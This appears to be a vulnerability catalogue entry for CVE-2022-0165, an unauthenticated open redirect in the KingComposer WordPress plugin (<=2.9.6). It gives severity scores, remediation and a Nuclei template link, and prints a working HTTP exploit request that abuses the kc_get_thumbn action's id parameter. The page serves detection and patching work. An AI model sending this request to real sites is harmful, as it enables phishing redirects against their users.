🔙 목록으로 돌아가기

CVE-2022-0165: WordPress Page Builder KingComposer <=2.9.6 - Open Redirect

TitleWordPress Page Builder KingComposer <=2.9.6 - Open Redirect
Authorakincibor
SeverityMedium
ImpactAn attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
RemediationUpdate to the latest version of KingComposer (>=2.9.7) to fix the open redirect vulnerability.
CVSS Score6.1
EPSS Score0.52255
CVE IDCVE-2022-0165
CWE IDCWE-601
Tags cve cve2022 wp-plugin redirect wordpress wp wpscan king-theme vuln

🔍 Vulnerability Description

WordPress Page Builder KingComposer 2.9.6 and prior does not validate the id parameter before redirecting the user to it via the kc_get_thumbn AJAX action (which is available to both unauthenticated and authenticated users).

🌐 HTTP Request

GET /wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-0165.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-0165.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A